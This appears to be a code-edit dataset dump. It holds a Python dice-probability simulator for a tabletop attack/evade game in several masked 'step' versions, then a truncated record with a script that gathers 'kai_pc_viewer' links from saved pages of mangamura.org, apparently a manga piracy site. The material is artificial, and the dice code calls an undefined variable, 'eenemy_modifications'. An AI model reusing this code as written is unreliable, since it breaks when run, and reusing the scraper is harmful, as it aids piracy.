return dice_list
def __print_dice_list(dice_list):
for i in range(len(dice_list)):
print(dice_list[i], end=' ')
print('')
<|reserved_special_token_0|>
def hits_vs_evade(hit_chances, evade_chances):
chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(1, len(hit_chances)):
for j in range(i):
chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]
total = 0.0
for i in range(1, len(chances)):
total = total + chances[i]
chances[0] = 1.0 - total
return chances
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + i * chance_list[i]
return avg
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
def result_str(res):
str = ''
if res & result.BLANK:
str += 'BLANK'
if res & result.FOCUS:
if len(str):
str += '|'
str += 'FOCUS'
if res & result.HIT:
if len(str):
str += '|'
str += 'HIT'
if res & result.CRIT:
if len(str):
str += '|'
str += 'CRIT'
if res & result.EVADE:
if len(str):
str += '|'
str += 'EVADE'
return str
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
def roll_attack_dice(number):
dice_results = []
for i in range(number):
dice_results.append(attack_die())
return dice_results
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
def __print_dice_list(dice_list):
for i in range(len(dice_list)):
print(dice_list[i], end=' ')
print('')
<|reserved_special_token_0|>
def get_hit_chances(number_of_dice, enemy_modifications=[],
friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_attack_dice, result.HIT |
result.CRIT, enemy_modifications, friendly_modifications)
def get_evade_chances(number_of_dice, enemy_modifications=[],
friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE,
enemy_modifications, friendly_modifications)
def get_crit_chances(number_of_dice, enemy_modifications=[],
friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT,
eenemy_modifications, friendly_modifications)
def hits_vs_evade(hit_chances, evade_chances):
chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(1, len(hit_chances)):
for j in range(i):
chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]
total = 0.0
for i in range(1, len(chances)):
total = total + chances[i]
chances[0] = 1.0 - total
return chances
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + i * chance_list[i]
return avg
<|reserved_special_token_1|>
# Imports
from __future__ import print_function
import numpy
from numpy.random import randint
from enum import Enum
__all__ = ["common", "plot"]
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
def result_str(res):
str = ""
if res & result.BLANK:
str += "BLANK"
if res & result.FOCUS:
if len(str):
str += "|"
str += "FOCUS"
if res & result.HIT:
if len(str):
str += "|"
str += "HIT"
if res & result.CRIT:
if len(str):
str += "|"
str += "CRIT"
if res & result.EVADE:
if len(str):
str += "|"
str += "EVADE"
return str
# DICE CLASSES DEFINITIONS
__attack_die_faces__ = [result.CRIT, result.HIT, result.HIT, result.HIT, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK]
__evade_die_faces__ = [result.EVADE, result.EVADE, result.EVADE, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK, result.BLANK]
class die:
def __init__ (self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
# DICE LIST METHOD DEFINITIONS
def count_relevant_results(dice_list, relevant_results):
count = 0
for i in range(len(dice_list)):
if dice_list[i].result & relevant_results:
count += 1
return count
def roll_attack_dice(number):
dice_results = []
for i in range(number):
dice_results.append(attack_die())
return dice_results
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
# DICE LIST MODIFICATION DEFINITITONS
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
# Debug
def __print_dice_list(dice_list):
for i in range(len(dice_list)):
print(dice_list[i], end=" ")
print("")
def get_dice_chances(number_of_dice, dice_roll_function, relevant_results, enemy_modifications, friendly_modifications):
relevant_counts = numpy.zeros((8))
num_iterations = 200000
for i in range(num_iterations):
dice_list = dice_roll_function(number_of_dice)
# Perform modifications
for j in range(len(enemy_modifications)):
dice_list = enemy_modifications[j].modify_dice_list(dice_list)
for j in range(len(friendly_modifications)):
dice_list = friendly_modifications[j].modify_dice_list(dice_list)
relevant_count_for_this_roll = count_relevant_results(dice_list, relevant_results)
relevant_counts[relevant_count_for_this_roll] += 1
chances = numpy.zeros((8))
for i in range(len(chances)):
chances[i] = float(relevant_counts[i]) / float(num_iterations)
return chances
def get_hit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_attack_dice, result.HIT | result.CRIT, enemy_modifications, friendly_modifications)
def get_evade_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE, enemy_modifications, friendly_modifications)
def get_crit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT, eenemy_modifications, friendly_modifications)
def hits_vs_evade(hit_chances, evade_chances):
chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(1, len(hit_chances)):
for j in range(i):
chances[i - j] = chances[i - j] + (hit_chances[i] * evade_chances[j])
total = 0.0
for i in range(1, len(chances)):
total = total + chances[i]
chances[0] = 1.0 - total
return chances
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + (i * chance_list[i])
return avg
|
flexible
|
{
"blob_id": "5261346f96e7520b6ef75a292b3d44a6f00d868c",
"index": 5566,
"step-1": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\ndef roll_evade_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(evade_die())\n return dice_results\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\n<mask token>\n\n\ndef average_chance(chance_list):\n avg = 0.0\n for i in range(1, len(chance_list)):\n avg = avg + i * chance_list[i]\n return avg\n",
"step-3": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\ndef result_str(res):\n str = ''\n if res & result.BLANK:\n str += 'BLANK'\n if res & result.FOCUS:\n if len(str):\n str += '|'\n str += 'FOCUS'\n if res & result.HIT:\n if len(str):\n str += '|'\n str += 'HIT'\n if res & result.CRIT:\n if len(str):\n str += '|'\n str += 'CRIT'\n if res & result.EVADE:\n if len(str):\n str += '|'\n str += 'EVADE'\n return str\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\ndef roll_evade_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(evade_die())\n return dice_results\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\ndef __print_dice_list(dice_list):\n for i in range(len(dice_list)):\n print(dice_list[i], end=' ')\n print('')\n\n\n<mask token>\n\n\ndef hits_vs_evade(hit_chances, evade_chances):\n chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n for i in range(1, len(hit_chances)):\n for j in range(i):\n chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]\n total = 0.0\n for i in range(1, len(chances)):\n total = total + chances[i]\n chances[0] = 1.0 - total\n return chances\n\n\ndef average_chance(chance_list):\n avg = 0.0\n for i in range(1, len(chance_list)):\n avg = avg + i * chance_list[i]\n return avg\n",
"step-4": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\ndef result_str(res):\n str = ''\n if res & result.BLANK:\n str += 'BLANK'\n if res & result.FOCUS:\n if len(str):\n str += '|'\n str += 'FOCUS'\n if res & result.HIT:\n if len(str):\n str += '|'\n str += 'HIT'\n if res & result.CRIT:\n if len(str):\n str += '|'\n str += 'CRIT'\n if res & result.EVADE:\n if len(str):\n str += '|'\n str += 'EVADE'\n return str\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\ndef roll_attack_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(attack_die())\n return dice_results\n\n\ndef roll_evade_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(evade_die())\n return dice_results\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\ndef __print_dice_list(dice_list):\n for i in range(len(dice_list)):\n print(dice_list[i], end=' ')\n print('')\n\n\n<mask token>\n\n\ndef get_hit_chances(number_of_dice, enemy_modifications=[],\n friendly_modifications=[]):\n return get_dice_chances(number_of_dice, roll_attack_dice, result.HIT |\n result.CRIT, enemy_modifications, friendly_modifications)\n\n\ndef get_evade_chances(number_of_dice, enemy_modifications=[],\n friendly_modifications=[]):\n return get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE,\n enemy_modifications, friendly_modifications)\n\n\ndef get_crit_chances(number_of_dice, enemy_modifications=[],\n friendly_modifications=[]):\n return get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT,\n eenemy_modifications, friendly_modifications)\n\n\ndef hits_vs_evade(hit_chances, evade_chances):\n chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n for i in range(1, len(hit_chances)):\n for j in range(i):\n chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]\n total = 0.0\n for i in range(1, len(chances)):\n total = total + chances[i]\n chances[0] = 1.0 - total\n return chances\n\n\ndef average_chance(chance_list):\n avg = 0.0\n for i in range(1, len(chance_list)):\n avg = avg + i * chance_list[i]\n return avg\n",
"step-5": "# Imports\r\nfrom __future__ import print_function\r\n\r\nimport numpy\r\nfrom numpy.random import randint\r\nfrom enum import Enum\r\n\r\n__all__ = [\"common\", \"plot\"]\r\n\r\nclass result(Enum):\r\n\tCRIT = 16\r\n\tHIT = 8\r\n\tEVADE = 4\r\n\tFOCUS = 2\r\n\tBLANK = 1\r\n\t\r\ndef result_str(res):\r\n\tstr = \"\"\r\n\tif res & result.BLANK:\r\n\t\tstr += \"BLANK\"\r\n\tif res & result.FOCUS:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"FOCUS\"\r\n\tif res & result.HIT:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"HIT\"\r\n\tif res & result.CRIT:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"CRIT\"\r\n\tif res & result.EVADE:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"EVADE\"\r\n\treturn str\r\n\r\n# DICE CLASSES DEFINITIONS\r\n\r\n__attack_die_faces__ = [result.CRIT, result.HIT, result.HIT, result.HIT, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK]\r\n__evade_die_faces__ = [result.EVADE, result.EVADE, result.EVADE, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK, result.BLANK]\r\n\t\r\n\r\nclass die:\r\n\tdef __init__ (self):\r\n\t\tself.rerolled = False\r\n\tdef __str__(self):\r\n\t\treturn result_str(self.result)\r\n\t@staticmethod\r\n\tdef __roll_die__(face_list):\r\n\t\treturn face_list[randint(0, 8)]\r\n\tdef equals(self, result):\r\n\t\treturn self.result & result\r\n\tdef change(self, to):\r\n\t\tself.result = to\r\n\r\nclass attack_die(die):\r\n\tdef __init__(self):\r\n\t\tdie.__init__(self)\r\n\t\tself.__roll__()\r\n\tdef __roll__(self):\r\n\t\tself.result = self.__roll_die__(__attack_die_faces__)\r\n\tdef reroll(self):\r\n\t\tif not self.rerolled:\r\n\t\t\tself.__roll__()\r\n\t\t\tself.rerolled = True\r\n\t\t\treturn True\r\n\t\treturn False\r\n\r\nclass evade_die(die):\r\n\tdef __init__(self):\r\n\t\tdie.__init__(self)\r\n\t\tself.__roll__()\r\n\tdef __roll__(self):\r\n\t\tself.result = die.__roll_die__(__evade_die_faces__)\r\n\tdef reroll(self):\r\n\t\tif not self.rerolled:\r\n\t\t\tself.__roll__()\r\n\t\t\tself.rerolled = True\r\n\t\t\treturn True\r\n\t\treturn False\r\n\r\n# DICE LIST METHOD DEFINITIONS\r\n\r\ndef count_relevant_results(dice_list, relevant_results):\r\n\tcount = 0\r\n\tfor i in range(len(dice_list)):\r\n\t\tif dice_list[i].result & relevant_results:\r\n\t\t\tcount += 1\r\n\treturn count\r\n\r\ndef roll_attack_dice(number):\r\n\tdice_results = []\r\n\tfor i in range(number):\r\n\t\tdice_results.append(attack_die())\r\n\treturn dice_results\r\n\r\ndef roll_evade_dice(number):\r\n\tdice_results = []\r\n\tfor i in range(number):\r\n\t\tdice_results.append(evade_die())\r\n\treturn dice_results\r\n\r\n# DICE LIST MODIFICATION DEFINITITONS\r\n\r\nclass perform(Enum):\r\n\tFOR_ALL = 7\r\n\tONCE = 1\r\n\r\nclass change:\r\n\tdef __init__(self, rule, from_result, to_result):\r\n\t\tself.rule = rule\r\n\t\tself.from_result = from_result\r\n\t\tself.to_result = to_result\r\n\tdef modify_dice_list(self, dice_list):\r\n\t\tfor i in range(len(dice_list)):\r\n\t\t\tif dice_list[i].equals(self.from_result):\r\n\t\t\t\tdice_list[i].change(self.to_result)\r\n\t\t\t\tif self.rule == perform.ONCE:\r\n\t\t\t\t\treturn dice_list\r\n\t\treturn dice_list\r\n\r\nclass reroll:\r\n\tdef __init__(self, rule, from_result):\r\n\t\tself.rule = rule\r\n\t\tself.from_result = from_result\r\n\tdef modify_dice_list(self, dice_list):\r\n\t\tfor i in range(len(dice_list)):\r\n\t\t\tif dice_list[i].equals(self.from_result):\r\n\t\t\t\tif dice_list[i].reroll() and self.rule == perform.ONCE:\r\n\t\t\t\t\treturn dice_list\r\n\t\treturn dice_list\r\n\t\r\n# Debug\r\ndef __print_dice_list(dice_list):\r\n\tfor i in range(len(dice_list)):\r\n\t\tprint(dice_list[i], end=\" \")\r\n\tprint(\"\")\r\n\t\r\ndef get_dice_chances(number_of_dice, dice_roll_function, relevant_results, enemy_modifications, friendly_modifications):\r\n\trelevant_counts = numpy.zeros((8)) \r\n\tnum_iterations = 200000\r\n\tfor i in range(num_iterations):\r\n\t\tdice_list = dice_roll_function(number_of_dice)\r\n\t\t# Perform modifications\r\n\t\tfor j in range(len(enemy_modifications)):\r\n\t\t\tdice_list = enemy_modifications[j].modify_dice_list(dice_list)\r\n\t\tfor j in range(len(friendly_modifications)):\r\n\t\t\tdice_list = friendly_modifications[j].modify_dice_list(dice_list)\r\n\t\trelevant_count_for_this_roll = count_relevant_results(dice_list, relevant_results)\r\n\t\trelevant_counts[relevant_count_for_this_roll] += 1\t\r\n\tchances = numpy.zeros((8))\r\n\tfor i in range(len(chances)):\r\n\t\tchances[i] = float(relevant_counts[i]) / float(num_iterations)\r\n\treturn chances\r\n\r\ndef get_hit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):\r\n\treturn get_dice_chances(number_of_dice, roll_attack_dice, result.HIT | result.CRIT, enemy_modifications, friendly_modifications)\r\n\r\ndef get_evade_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):\r\n\treturn get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE, enemy_modifications, friendly_modifications)\r\n\r\ndef get_crit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):\r\n\treturn get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT, eenemy_modifications, friendly_modifications)\r\n\r\ndef hits_vs_evade(hit_chances, evade_chances):\r\n\tchances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\r\n\tfor i in range(1, len(hit_chances)):\r\n\t\tfor j in range(i):\r\n\t\t\tchances[i - j] = chances[i - j] + (hit_chances[i] * evade_chances[j])\r\n\ttotal = 0.0\r\n\tfor i in range(1, len(chances)):\r\n\t\ttotal = total + chances[i]\r\n\tchances[0] = 1.0 - total\r\n\treturn chances\r\n\t\r\ndef average_chance(chance_list):\r\n\tavg = 0.0\r\n\tfor i in range(1, len(chance_list)):\r\n\t\tavg = avg + (i * chance_list[i])\r\n\treturn avg",
"step-ids": [
24,
26,
29,
33,
38
]
}
|
[
24,
26,
29,
33,
38
] |
<|reserved_special_token_0|>
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
<|reserved_special_token_0|>
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
'htmls/*')]):
key = index % 12
if args.get(key) is None:
args[key] = []
args[key].append(name)
<|reserved_special_token_0|>
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map, args):
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
URL = 'http://mangamura.org'
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
args = {}
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
'htmls/*')]):
key = index % 12
if args.get(key) is None:
args[key] = []
args[key].append(name)
args = [(key, names) for key, names in args.items()]
urls = set()
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map, args):
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
<|reserved_special_token_1|>
import glob
import json
import pickle
import gzip
import os
import hashlib
import re
import bs4, lxml
import concurrent.futures
URL = 'http://mangamura.org'
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
args = {}
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
'htmls/*')]):
key = index % 12
if args.get(key) is None:
args[key] = []
args[key].append(name)
args = [(key, names) for key, names in args.items()]
urls = set()
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map, args):
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
<|reserved_special_token_1|>
import glob
import json
import pickle
import gzip
import os
import hashlib
import re
import bs4, lxml
import concurrent.futures
URL = 'http://mangamura.org'
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search(r'kai_pc_viewer\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
args = {}
for index, name in enumerate([name.split('/').pop() for name in glob.glob('htmls/*')]):
key = index%12
if args.get(key) is None:
args[key] = []
args[key].append( name )
args = [(key,names) for key, names in args.items()]
urls = set()
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map,args) :
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
|
flexible
|
{
"blob_id": "3acd592594ae4f12b9b694aed1aa0d48ebf485f5",
"index": 5787,
"step-1": "<mask token>\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\n<mask token>\n",
